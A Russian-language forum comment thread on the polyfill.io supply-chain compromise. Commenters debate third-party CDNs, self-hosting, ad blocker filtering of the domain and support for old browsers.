> Да где тут логика? У тебя есть данные по его серваку?Какие тебе нужны данные, чтобы понять, что при всех прочих равных у одного сервера меньше сощностей, чем у 10?
> Ты даже считать не умеешь: "100% меньше мощностей" даёт в результате 0.
А ты читать умеешь? В контексте фразы "у твоего сервака 100% меньше мощностей, чем у CDN, чтобы хостить свою версию" проценты означают вероятность вероятнось.
Я не писал "на 100% меньше" или "в 100% меньше". Объясни, что ты считал?
>> Да где тут логика? У тебя есть данные по его серваку?
> Какие тебе нужны данные, чтобы понять, что при всех прочих равных у
> одного сервера меньше сощностей, чем у 10?Для начала, покажи данные по количеству серверов, что у него есть. Подтверди свою гипотезу про 1.
>> Ты даже считать не умеешь: "100% меньше мощностей" даёт в результате 0.
> А ты читать умеешь? В контексте фразы "у твоего сервака 100% меньше
> мощностей, чем у CDN, чтобы хостить свою версию" проценты означают вероятность
> вероятнось.Я и прочёл: мастер риторики пытался написать красиво, а показал знание арифметики.
> Я не писал "на 100% меньше" или "в 100% меньше". Объясни, что
> ты считал?Я считаю, что формулу полной вероятности ты в глаза не видел, стало быть не мог на неё ссылаться.
потомушта докер в бесплатном облаке
чего ета - в бесплатном-то? В платном. Не из девляпсового же ж карманца.Л-х не мамонт.
Лень. Официальный CDN прописывают только на время разработки. В проде собирают webpack.
Потому что это сервис, который генерирует полифиллы для конкретной версии браузера, исходя из заголовка user-agent. Во-первых, самому такое хостить не всегда получится, там наверняка оптимизированный под эту задачу веб-сервер. Во-вторых, это ведь не только для древности, новые фичи в JS постоянно появляются, браузеры постоянно меняются, для вышедшей завтра новой версии какой-то полифилл может оказаться не нужен, и точно никто не хочет это поддерживать самостоятельно.Тот случай, когда сторонний сервис удобен и практичен. Но на том, кто такой сервис запустил, большая ответственность, и продавать такое сомнительным китайцам... Ну, может, деньги очень нужны были, могу понять.
> Во-первых, самому такое хостить не всегда получится, там наверняка оптимизированный под эту
> задачу веб-сервер.вам лучше подметать улицы. Э... нет, лучше тоже не надо. А то вы граблями будете. Вместо метлы.
> Тот случай, когда сторонний сервис удобен и практичен.
но дядин.
> Но на том, кто такой сервис запустил, большая ответственность
простите, но вы ему ничего не заплатили. И он вам ничего не должен и ни за что отвечать не собирается. Вы должны отвечать перед своими клиентами за выбор чужой халявы.
> Ну, может, деньги очень нужны были, могу понять.
ему просто стало неинтересно. А это сомнительное хобби обходилось довольно недешево. (заметьте, кстати, что в отличие от вас он не только справился с написанием и поддержкой довольно замороченного и браузерозависимого кода, но и с его хостингом на собственных ресурсах очень продолжительное время)
И вместо того чтобы просто выключить сервер и положить пол-интернета любителей удобно и практично за чужой счет, он его продал тем кто не выключит. Заодно и окупил затраты.
Веб-разраб думает, что использование стороннего скрипта напрямую с CDN стороннего скрипта приведёт к тому, что новые версии с исправленными уязвимостями будут появляться прямо на CDN, а ему не надо будет напрягаться и следить за всеми этими версиями. То, что с CDN может прилететь не только исправление уязвимости, но и новые уязвимости, веб-разраб не думает.
Локальную копию обновлять надо самостоятельно или колхозить что-то, кэшируется хуже, трафик опять же дополнительный.Тем не менее, кто хочет - использует, иногда даже очень древние версии (что тоже не хорошо).
Хостясь на AWS ты платишь за время работы, если к твоему сайту нет запросов, то ты не платишь ничего. А если к нему прилетело овердохрена, то ты банкрот. Я подозреваю, что это и приводит к тому, что люди избегают хостить что-либо, а когда надо, хостят по минимуму.
они прост строчки копируют, так модно
Мне одному стрёмно, что такая библиотека "продаётся" компании из Китая?
В каких еще целях окупится такой проект, если не прикрутить туда рекламу и вирусню?
Несли цивилизацию, демократию и рынок... ну донесли, чё.Попался, к сложалению, жадноватый человек, что, к сожалению, не редкость.
> Попался, к сложалению, жадноватый человек, что, к сожалению, не редкость.Люди использовали халявку - как сам Polyfill, так и его CDN - а жадным при этом оказался автор, который пилил это все за бесплатно.
Опеннетная логика, бессмысленная и беспощадная.
>такаяНенужная?
> Мне одному стрёмно, что такая библиотека "продаётся" компании из Китая?То есть, если бы её продали в Албанию, Маршалловы острова или США, было бы менее стрёмно?
Надо было в Северную Корею продать.
Назови из тех стран такие, что массово покупают опенсорсные проекты под раздачу кала в будущем.
Мне единственный пример приходит продажа Adblock Plus, но там даже рядом таким не пахло, просто
они монетизировались на неназойливой реклами например как тут на опеннете.
покупатель ублока вроде был из правильной страны?Ну и что такое неназойливая реклама - каждый решает сам. Этот вот китаец решил что пара окошек с онлайн-казино вполне неназойлива, ты ж наверное хочешь проиграть пару тыщ?
||polyfill.io^$all
Хм, это права владельца продавать свой проект. Порой я тоже думаю над этим - есть некоторые популярные. Не стоит забывать что все продукты не являются ничейными если вам достались бесплатно. Это ж не помойка.
>все продукты продаются криминалу
>Это ж не помойка.Помойка, самая настоящая, помоечный идеал.
>Проект Polyfill в феврале был продан
>Те, кому Polyfill по-прежнему необходим, могут использовать на своём сервере локальную копию на основе кода из репозитория с форком, созданным изначальным автором проекта.То есть автор продал и тут же форк сделал? Подозревал что-то? Зачем продал тогда?
И деньги получил, и при своём остался - помоему отличная сделка
почему тут же? как вы пришли к этому выводу?
люди начали жаловаться, что новый владелец творит какую-то дичь и автор создал форк, но не стал его нигде разворачивать. Просто заведомо чистый код выложил из-за жалоб
А не надо делать сайты, где приходится "для обеспечения совместимости со старыми версиями браузеров"!! Делайте сайты сразу для старых браузеров. И без долбаного жабоскрипта!
Дорогая поддержка как правило получается. Да и множество веб-программистов не знают как без жабоскрипта. Хотя мне идея нравится - поддержка netsurf на Kolibri как вариант.
В целом можно утверждать что жертвами должны были стать множество американских ИТ компаний корпоративных решений.
У жабоскрипт программистов есть куча инструментов для сборки сайтов под старые браузеры. Единственная проблема это CSS, который нельзя нормально заполифиллить. Но если ограничить себя ранним флексбоксом, то можно даже IE 11 поддерживать. Без флексбокса уже ну очень больно верстать.
Уж больно редко в вёрстке есть нужное людям.Для бизнеса - часто. Но чужой бизнес не волнует от слова совсем и нужен ооочень редко.
А полезные и нужные вещи просты в любом браузере.
Ограничь себя CSS2 и радуйся. Ну или пиши бесплатный конвертер с открытым кодом. Мы будем все тебе ныть. Может потом продашь китайцам.
Поддержка-то недорогая, там в консервативном фронтэнде стек технологии короче и стабильнее, всегда бы так.Но заказчик будет хотеть пимпочки и рюшечки, которые в bleeding edge версиях браузеров только начали поддерживаться, и чаще всего в каком-то одном. Либо (наиболее вероятно) фронтдев хочет модно-молодёжно "быстрая разработка - медленный рантайм" что-нибудь, потому что лень или некогда.
> Но заказчик будет хотеть пимпочки и рюшечки, которые в bleeding edge версиях браузеров только
> начали поддерживатьсязаказчик на самом деле не будет этого хотеть - он не читал release notes и понятия не имеет что еще там стало сегодня с обеда поддерживаться.
более того, вся суть полифила была в том что он таки поддерживал новые фичи, отсутствующие в не совсем модном браузере. Т.е. если бы заказчик на самом деле этого хотел - запилить в немодном несовременном стеке было бы можно (правда, с тормозами). Но он не хочет это оплачивать.
Максимум чего хочет заказчик - это "шоб сайт не хуже чем у пацанов!"
> Максимум чего хочет заказчик - это "шоб сайт не хуже чем у пацанов!"Это те де6ильные SPA? Нет уж, спасибо... Лучше старая добрая статика, чем этот маразм.
>> Максимум чего хочет заказчик - это "шоб сайт не хуже чем у пацанов!"
> Это те де6ильные SPA?Мне кажется, заказчик и ЭТОГО тоже не заказывал. В смысле, не имел в виду именно эту фичу как "не худшую чем у пацана", и прекрасно бы обошелся без нее. Просто яа-у-мамы-дизигнер так видит.
> Нет уж, спасибо... Лучше старая добрая статика, чем этот маразм.
SPA вполне бывают динамическими. Лучше от этого, естественно, никому не становится.
Расскажи это свидетелям и пользователям фэйсбука и инстаграмма. И как правило это требование архитектора, если про уровень предприятия.
> Расскажи это свидетелям и пользователям фэйсбука и инстаграмма.пейсбук и хипстаграм довольно таки всеядны к браузерам. Ну за исключением любимого тут всеми ешака6. (втентакль куда более дое6ист - возможно там тоже полифил) При том что если завтра они вообще в любом браузере перестанут открываться - никто даже особо и не заметит. Во-первых в РФ уже. Во-вторых таки не заметили. Потому что... правильно - потому что они уже давно телефонные приложеньица, и редкие извращенцы открывающие десктопные версии - не аудитория.
> И как правило это требование архитектора, если про уровень предприятия.
ну мы все понимаем ведь, каковы эти архитекторы уровня свечных заводиков?
Да ну как "дорогая"... если сайт написан один раз и надёжно, что тут может быть "дорогого"? (кроме специалиста, который может проф. верстать без жабоскриптов)
Раньше как-то ВЕСЬ веб обходился без JS - и ничего, ВСЁ работало! И меню, и форумы, и электронные магазины... как они так умудрялись, имея только HTML 3 и CGI? :)
> И меню, и форумы, и электронные магазины... как они так умудрялись,ну...э... как-то оно конечно работало, но я не очень хочу туда в такое светлое прошлое
> имея только HTML 3 и CGI? :)
masterbank.ru образца 2008го года - "введите номер счета в это поле... да-да, ручками все стопиццотцифирок, старайтесь не ошибаться, а то заново будете все поля (их не одно!) заполнять" (ведь проверить допустимость ввода на ходу Cgi нам не позволит - все как у дидов, только по нажатию submit)
masterbank.ru образца 2009го года - "ну ладно, для ваших СОБСТВЕННЫХ аж трех счетов - нажмите вот сюда" (новая страница, не фрейм или что еще, где можно галочкой выбрать один из трех и вернуться к преды...нет, к новой где это поле уже заполнено и его нельзя редактировать. Спасибо, а то на старой версии их посмотреть было негде - надо открывать во втором окне другую страницу где есть эти номерки)
ну как-то так себе удобства, если честно. Причем ты, понятно, не захочешь ТАК реализованной страницы с выбором переводов каким-то организациям и простыней на двадцать экранов без автопоиска и автофильтров. И двадцать раз кликать по ссылкам на иерархическую (которую еще кто-то должен придумать за тебя и сделать чтоб ты нашел искомое а не заблудился и вынужден был начинать с самого верха) тоже не хочешь.
Но да, отрисовывалось такое - мгновенно. Даже не на коре дуба а на селероне 486. И даже то что до отрисовки целиком загружалось с сервера - было абсолютно ненапряжно.
> masterbank.ru образца 2008го года - "введите номер счета в это поле... да-да, ручками все стопиццотцифирок, старайтесь не ошибаться, а то заново будете все поля (их не одно!) заполнять" (ведь проверить допустимость ввода на ходу Cgi нам не позволит - все как у дидов, только по нажатию submit)На сегодняшний день сложно обеспечить безопастность без JS если речь идёт о банке. В таком случае придётся красными буквами писать что это не очень безопасно и подключать как-то это отдельно. Есть несколько типов атак, от которых такой банк не будет защищен, которые мне сразу приходят в голову. Я не буду вам рассказывать конкретно об этих атаках по понятным причинам.
Впрочем и средства противодействия тоже начали приходить в голову.
так то никто не запрещал cgi при ошибке "неправильно заподнено поле" заполнять поля уже введенными данными, чтоб не пришлось всё заново делать.
Тут жаваскрипт не нужен. Но да, на каждое действие надо перегружать страницу, целиком.
да, но это тебе ДВА раза на потрахаться - один - проверить валидность, а второй - отдельно отличать перезагрузку такой формы от случая "юзер открыл ее в первый раз".А программист скотина ленивая и пока ее не пнут - не программировает.
Год вон ушел на то чтоб свои же счета можно было выбрать из списка а не копипастить из соседнего окошка вручную.
не надо различать - заполняем все что пришло в нужных полях в запросе. Первый раз это будут пустые значения, потом - то что пользователь вводил.
Ты ещё флеш вспомни и ActiveX.
...Macromedia Flash
> Ты ещё флеш вспомни и ActiveX.И чертовы Java апплеты.
Как послушать старпёров, так веб раньше вообще конфеткой был. Хорошо, что такого веба больше нет...
Зачем поддерживать старые сайты. Обычно это Ослики виндовые. которых уже ноль целый хрен десятых осталось на рынке.
Чтобы я с Windows XP и MyPal (идеально если с Internet explorer 6) мог ими пользоваться. Да и большинству паутинных страничек достаточно CSS 2 и HTML 4 и можно без CSS. JavaScript тоже не нужен. WWW это текст и картинки а HTML средство разметки текста если кто забыл. Смысла в том что, например странички с сайта банка перестают работать из–за того что браузер не может отрисовать серые прямоугольники вместо грузящегося текста никакого.
> Чтобы я с Windows XP и MyPal (идеально если с Internet explorer 6) мог ими пользоваться.Видишь ли, писать с поддержкой IE - это время и деньги (как минимум на то, чтобы тестировать в IE). А они не окупятся десятком неплатежеспособных пользователей.
То есть если у тебя нет денег на новую ось и железо, то почему бизнес должен это оплачивать?
Ты переоцениваешь "тестирование в IE" :) Более того - если сайт свёрстан под HTML 3, тебе вообще почти ничего не придётся "тестировать", т.к. выглядеть всё будет почти одинаково! Тупо в силу того, что ыт использовал ПРОСТЫЕ ТЕГИ, а не замороченный JS.
> Ты переоцениваешь "тестирование в IE" :) Более того - если сайт свёрстан
> под HTML 3, тебе вообще почти ничего не придётся "тестировать", т.к.
> выглядеть всё будет почти одинаково! Тупо в силу того, что ыт
> использовал ПРОСТЫЕ ТЕГИ, а не замороченный JS.Между версией HTML и использованием JS нет прямой связи.
JS и до HTML5 активно использовался. И по правде говоря, HTML5 как раз уменьшает использование JS, а вот HTML3 как раз увеличивает.
Был бы в теме, понимал это.
Я надеюсь на некий здравый смысл уберегающий от бесконечного раздувания и накручивания свистелок вместе с перделками а также постоянного переделывания всего в соответсвии с новыми возможностями в браузирах. Ещё мне кажется что где–то там существует сотрудник у которого на душе становится теплее от осознания того что люди пользующиеся его HTML страничками могут делать это из Internet explorer 6. А по поводу денег, то они и так их сжигаю оплачивая работу кучи вэбщиков со знанием всяких фреймворков.
> странички с сайта банка перестают работать из–за того что браузер не может отрисовать серые прямоугольники+1000000000!!! Именно! Второстепенные перделки, которые мне вообще не упали, внезапно блокируют мне САМОЕ ГЛАВНОЕ, ради чего я зашёл на сайт!!
> Чтобы я с Windows XP и MyPal (идеально если с Internet explorer 6) мог ими пользоваться.если заплатишь им за поддержку своего 6 ишака несколько десятков тысяч евро - будет поддержка
но большинство людей со здравым рассудком сидят на хромиуме или сафари последних версий. ну, может, 2 калеки на фаерфоксе
Дело не в осликах, а в технологиях. Ты ПЕРЕГРУЖАЕШЬ ненужной хренью как сервер, так и клиента, так и самого программиста! Накой тебе 5 мегабайт скриптов для простой формы фидбэка?!!?!?!!? Там всего один тег [form] ! Это уже не говоря про апдейт этой хрени - простой HTML 3 можно курочить не приходя в сознание. А с жабоскриптами и тоннами CSS ты просто всё развалишь.
Ну это вы просто ничего сложнее сайтиков на вордпрессах-джумлах не делали. Попробуйте сделать аналог GMail или Google Docs, так, чтобы было не менее юзабельно, чем на десктопе, и не тормозило так, как оно тормозит у Гугла :) Сразу все новые фичи браузеров окажутся далеко не бесполезными.А когда для банального контентного сайтика тащат весь современный стек, я и сам удивляюсь, конечно.
А каждому веб-сайту нужна сложность уровня офисного пакета? Такие являются исключением из большинства.З.Ы: Лучше просто установить MS Office 97, чем юзать гугл доки.
Пусть лучше вэбщики мучаются. Работа у них такая. Да и существовали же как–то наовороченный gmail и прочее в каком–то там году когда фич было не так много.
И ещё по теме - полифиллы этой библиотеки не всегда работали. Помню как-то вместе с react встретил проблему с полифилами.
Любители тащить в рот лефтпады из первого попавшегося источника снова на острие, да что ж ты будешь делать-то. Ну и их пользователи, само собой, верная ЦА.
интересно, окупилась покупка или нет. такую активность быстро палят, какой смысл.
Всмысле проект продан? Он чего-то стоил сам по себе? Уже подозрительно.
конечно стоил. Когда ты свой код будешь (прям со своего сервера загружающийся на ходу) исполнять на миллионах клиентских браузеров - то тоже сможешь продаться китайцам подорого.Причем совершенно неважно, нужен кому этот код на самом деле или нет.
Такого же вроде бы никогда-никогда не было? И вот вдруг опять...
Ublock Origin уже заблокировал его в списке Badware Risks.
теперь все сайты, использующие полифилы, просто не работают. Отличное решение, на пять баллов.
> теперь все сайты, использующие полифилы, просто не работают. Отличное решение, на пять баллов.Думаешь, лучше было оставить "вредоносный код, перенаправляющий пользователя на мошеннические сайты (например, googie-anaiytics.com), букмекерские конторы и online-казино"?
Вряд ли не работают. Скриптом больше, скриптом меньше..>>Отличное решение, на пять баллов.
Так того самого скрипта на сервере уже и так нет, а есть совсем другой, зараженный, хоть с тем же именем.
У Вас есть идеи как лучше практически сертифицированными на зловредность скриптами поступать? :)
> Вряд ли не работают. Скриптом больше, скриптом меньше..если сайт использует полифил - не работает. Пустое белое ничего.
Даже любимых всеми овальчиков полупрозрачных нечем отрисовать.
И пользователю сообщить в чем проблема - тоже некуда. Был бы сам сайт в списке вредных - ублок бы справился, но это не сайт а скрипт с сайта. Такое он не умеет.> Так того самого скрипта на сервере уже и так нет, а есть
> совсем другой, зараженный, хоть с тем же именем.он хотя бы сайт отрисует. Ну, не без рекламы онлайн-казино (в чем собственно разница- скрипт это делает или сам владелец сайта решил озолотиться еще и таким образом? так и так если тебе сайт кровь из носу нужен - будешь чертыхаясь закрывать окошки онлайн казлин пока не получишь нужный результат, а нет - внесешь тот сайт в свой умственный список заблокированных и больше туда не пойдешь)
> У Вас есть идеи как лучше практически сертифицированными на зловредность скриптами поступать?
ну путь децетралайза теоретически проходим. Не уверен что у ублока при этом хватит встроенных средств.
Нахвататься вирусни правильное решение? Или ты один из владельцев казино-выгодополучателей.Современным браузерам не нужны полифилы и без них всё работает.
> Или ты один из владельцев казино-выгодополучателей.Нет, он один из местных юродивых, которые везде встяют со своим альтернативным мнением.
> Современным браузерам не нужны полифилы и без них всё работает.на сайте изначально написанном для найтли билда твоего браузера - работает.
Если сайт использовал полифилы - нет, не работает.
> теперь все сайты, использующие полифилы, просто не работают. Отличное решение, на пять
> баллов.Именно! И ирония тут неуместна.
>теперь все сайты, использующие полифилы, просто не работают. Отличное решение, на пять баллов.Мошенников надо выявлять и давить всеми возможными способами. Ты видимо сочувствуешь мошенникам.
https://blog.danieljanus.pl/2019/10/07/web-of-documents/
> https://blog.danieljanus.pl/2019/10/07/web-of-documents/а теперь оплати штраф за парковку этим уе6офдокументс.
Ну или с вечера занимай очередь в сберкассу.
> Оригинальный разработчик заявил, что никогда не владел доменом polyfill .ioЕсли это так, то 100000 неграмотных разработчиков не просто добавило лишнюю библиотеку (точку атаки), а добавило библиотеку с левого домена.
Домену столько же лет сколько самой библиотеке: Creation Date: 2013-03-18T19:00:23Z
Напоминает историю с XZ, где разраб говорил что я не я у меня не было доступа кто то там что то закомитил итд итп.
>на основе кода из репозитория с форком, созданным изначальным автором проекта
>1. сделать популярную либу
>2. монетизировать через продажу
>3. сделать форк, повторить с ним пункты 1-2
>4. PROFIT!!!!Автор молодец. Не из тех мамонтов, вроде тех, что на https://xkcd.com/2347/ изображены, а за деньги либу разрабатывает и сопровождает. В немамонтах - пользователи сайтов, использующих эту либу. Владельцы же сайтов - в доле - им бесплатную либу для развития их бизнеса, с них - ресурсы браузеров посетителей их сайтов, отличная сделка.
За использование таких сервисов (еще до проблемы) нужно премию Дарвина выдавать. Итог предсказуем.
В настоящее время для старых браузеров успешно задействуется babel, у которого свой полифил-плагин. Так что, проблемы сабжа не должны сказаться на поддержке старых браузеров.
Не понимаю зачем поддерживать старый хлам? А про альтернативно одаренных тут правильно говорили, тащат весь стек там где это на фиг не надо